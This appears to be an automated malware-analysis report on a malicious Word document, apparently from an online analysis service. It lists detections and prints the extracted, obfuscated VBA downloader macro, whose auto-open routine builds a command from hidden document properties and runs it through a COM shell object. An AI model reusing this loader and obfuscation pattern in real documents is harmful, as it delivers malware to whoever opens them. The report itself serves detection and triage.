MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Office document containing obfuscated VBA macros. Heuristics indicate an auto-executing loader that uses CreateObject and Shell execution, typical of malware downloaders. The ClamAV signature 'Doc.Macro.VBSDownloader-6336817-0' further confirms its malicious nature as a downloader.
Heuristics 9
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0 YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0 YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() VKbZcLUg -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6793 bytes |
SHA-256: a74d516e60e730a674036951b7790dc60617b8c6c2efbb724e16fbc72bae699c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
99 of 138 identifiers look randomly generated (e.g. 'DdUfWKsECzw') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function BFvwAuZaVks()
XAamgnsVVb = 5165
Dim SrGPDtnepsZ(5165)
GHzbxwpn = "vtSrDzbX"
amnKkpVwV = "VWseGNg"
SrGPDtnepsZ(2227) = awzenTtPGY
SrGPDtnepsZ(4272) = WUkcPat
SrGPDtnepsZ(3669) = 7075 + 6231 + 8852 + 5718 / 4558 / 9361 / 1558 - 7755 - 3944 + 3708 + 9243
SrGPDtnepsZ(4564) = 2190 + 1532 + 1910 / 8793 - 9797 + 4889 + 4615
SrGPDtnepsZ(3963) = 2418 + 5027 / 3108 / 7451 - 9786 - 548 - 2611 + 2156 + 5715
SrGPDtnepsZ(4468) = sTrKDrEMD
SrGPDtnepsZ(4882) = hxGDwUsz
SrGPDtnepsZ(4115) = yYWXhtA
SrGPDtnepsZ(4036) = 513
SrGPDtnepsZ(1906) = 4149
SrGPDtnepsZ(4353) = 4888
SrGPDtnepsZ(4520) = 4721
SrGPDtnepsZ(3908) = WnFmeKgcP
SrGPDtnepsZ(79) = uDLZbSACx
SrGPDtnepsZ(4255) = KUeDGrVbCdS
SrGPDtnepsZ(1019) = 6267 + 4071 / 215 / 3455 / 1127 - 6146 - 6217 - 8856 + 6066 + 6423 + 3276
SrGPDtnepsZ(845) = 9362 + 6185 / 6055 - 688 - 7820 - 794 + 1692 + 3520 + 897
SrGPDtnepsZ(1049) = 3086 + 9498 + 5926 + 8841 / 4542 - 6575 - 5633 - 7816 + 7935 + 1215
For XAamgnsVVb = 2759 To 3545
SrGPDtnepsZ(XAamgnsVVb) = XAamgnsVVb
Next
cHyBNGb = SrGPDtnepsZ(926) + SrGPDtnepsZ(3005) + SrGPDtnepsZ(3149) + SrGPDtnepsZ(1498) + SrGPDtnepsZ(5165)
ueCChrd = SrGPDtnepsZ(2748) + SrGPDtnepsZ(83) + SrGPDtnepsZ(4223) + SrGPDtnepsZ(3116) + SrGPDtnepsZ(159) + SrGPDtnepsZ(5165)
End Function
Function NhvPuxvN()
TnrRkfSK = 2872
Dim wYVwYPZF(2872)
KPUdypH = "mNbsMXPAeu"
wYVwYPZF(413) = DAzwxYTPDpn
wYVwYPZF(1629) = CtULWMbR
wYVwYPZF(959) = SXrHAePSKs
wYVwYPZF(1423) = 9521 + 1988 / 4344 / 6200 - 9941 - 5877 - 7876 + 5040 + 6001
wYVwYPZF(2812) = 4990 + 6672 / 6251 / 7159 - 7847 + 6786
wYVwYPZF(1132) = 4988 + 8786 / 7729 / 2597 / 8154 - 653 - 6983 + 9292 + 6301
wYVwYPZF(812) = vAMKygw
wYVwYPZF(1254) = DdUfWKsECzw
wYVwYPZF(1555) = 727
wYVwYPZF(1707) = LXFkhuTZhX
wYVwYPZF(1518) = vdMuzhTfgS
wYVwYPZF(1777) = BVmcmTXF
wYVwYPZF(1682) = XsBSUrH
wYVwYPZF(1908) = 3573 + 8612 + 9318 + 9297 / 9023 / 8782 / 9059 - 6885 - 4062 - 3479 + 2192 + 697
wYVwYPZF(644) = 849 + 8506 + 8665 / 3519 / 1456 / 4453 - 1186 + 632
wYVwYPZF(713) = 6508 + 6703 / 3722 - 1205 - 8884 - 2100 + 4052 + 1127
For TnrRkfSK = 102 To 160
wYVwYPZF(TnrRkfSK) = TnrRkfSK
Next
cvrTLUP = wYVwYPZF(1737) + wYVwYPZF(2715) + wYVwYPZF(996) + wYVwYPZF(479) + wYVwYPZF(2484) + wYVwYPZF(292) + wYVwYPZF(1105) + wYVwYPZF(2872)
YHNcNpTz = wYVwYPZF(701) + wYVwYPZF(749) + wYVwYPZF(2276) + wYVwYPZF(2872)
cFzHxGk = wYVwYPZF(905) + wYVwYPZF(2182) + wYVwYPZF(2382) + wYVwYPZF(2872)
End Function
Sub autoopen()
VKbZcLUg
End Sub
Public Function yKvCXNf(vRKbufsX)
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
KADXEmH = ActiveDocument.CustomDocumentProperties(vRKbufsX)
yKvCXNf = KADXEmH
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Function
Public Function VKbZcLUg()
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
DEBAKSwY = yKvCXNf("ankMNxSvDuv") + yKvCXNf("fDaHszez") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("kfShLKvtYaW") + yKvCXNf("drgLHvTZD") + yKvCXNf("RzsFTKsMa")
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
ZneZkvTk = yKvCXNf("PpRDVaYk") + yKvCXNf("SnVfbyV") + yKvCXNf("NBhWRnnr") + yKvCXNf("nGmERhbgD") + yKvCXNf("MHmBmVtxxeD") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + yKvCXNf("GZnvfVd")
mNaCbmDx = ZneZkvTk + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + fPsFbYX
CreateObject(DEBAKSwY).Run$ mNaCbmDx + KeyeUgtkrd + HuPuESkLhy + zemaEVc + SuGvNTkzE + YPCrwmVkT + HptZKepNwvX + vmuvTSP + KxxGMpUX + RkbrfNxRNWd + tNGdshzMD + atMRBBmV, 0
YbaUHkeFD = uHbuDLuPaXz + dTEEdye = zSHBfXvvPhg
LLMCLDwa = CvEgYnc + ZXRdwWtWs = xRpcauKYvP
MmMRXtv = zKecGnebZ + HSLCRHhWhTY = RENNUypsA
WvZKmYA = yNVhWYMh + GwEPaxeu = ksruaGK
XXAPeyaxGAg = UGfXgcWmXKZ + KSHyZyt = rebUFAuEWy
End Function
Function mRfpfKhGSD()
mCzGYYaxRLX = 8385
Dim MCGPUwUZMWy(8385)
caMKKbnBu = ("rFNuCnmpUU")
ALKNUwLcpPu = ("SLCZxtuyhF")
MczvCeNBH = ("XLSHkERKtnR")
MCGPUwUZMWy(7904) = UcwcACY
MCGPUwUZMWy(2787) = rbUkPum
MCGPUwUZMWy(684) = 7163 + 811 + 710 / 7663 / 5363 / 1108 - 3395 - 7739 + 4644 + 8393 + 9078
MCGPUwUZMWy(1867) = KwvDMWrrG
MCGPUwUZMWy(1721) = LzkZWpB
MCGPUwUZMWy(7960) = 8725
MCGPUwUZMWy(8262) = 7312
MCGPUwUZMWy(6212) = 8270
MCGPUwUZMWy(298) = ZUpymUKM
MCGPUwUZMWy(3896) = 954 + 9998 / 9266 / 6580 - 736 - 883 + 2313 + 1188 + 5675
For mCzGYYaxRLX = 7999 To 5163
MCGPUwUZMWy(mCzGYYaxRLX) = mCzGYYaxRLX
Next
KAyYxEHgrP = MCGPUwUZMWy(3814) + MCGPUwUZMWy(8385)
ZBXEkbtP = MCGPUwUZMWy(3170) + MCGPUwUZMWy(1765) + MCGPUwUZMWy(8385)
End Function
Function gHXrdcyrg()
WavCCbxD = 8004
Dim EhAUrkkxwMG(8004)
naRAuCU = ("vgaYmNPnVX")
EhAUrkkxwMG(2991) = eNECkccF
EhAUrkkxwMG(6466) = FbcdBnKRuK
EhAUrkkxwMG(3066) = kfEeTmdvHNy
EhAUrkkxwMG(3977) = vLuXaKtP
EhAUrkkxwMG(2869) = 4459 + 146 + 7490 / 9816 - 7410 - 8463 - 2553 + 451 + 8893
EhAUrkkxwMG(5881) = mtpNLGb
EhAUrkkxwMG(5248) = gfxcZDpkv
EhAUrkkxwMG(2458) = SsvSpWe
EhAUrkkxwMG(458) = AVUPYHGfC
EhAUrkkxwMG(4552) = 198
EhAUrkkxwMG(5266) = XvRCbwhh
EhAUrkkxwMG(4843) = eXHbUGY
EhAUrkkxwMG(6934) = dHZNEDyDcv
EhAUrkkxwMG(4138) = MvYmwSeRUT
EhAUrkkxwMG(6033) = 8623 + 2405 / 7340 / 2292 - 2848 - 4607 + 3843 + 888 + 8671
For WavCCbxD = 830 To 4845
EhAUrkkxwMG(WavCCbxD) = WavCCbxD
Next
PHZLUddDVam = EhAUrkkxwMG(7146) + EhAUrkkxwMG(7682) + EhAUrkkxwMG(122) + EhAUrkkxwMG(417) + EhAUrkkxwMG(4616) + EhAUrkkxwMG(1498) + EhAUrkkxwMG(8004)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.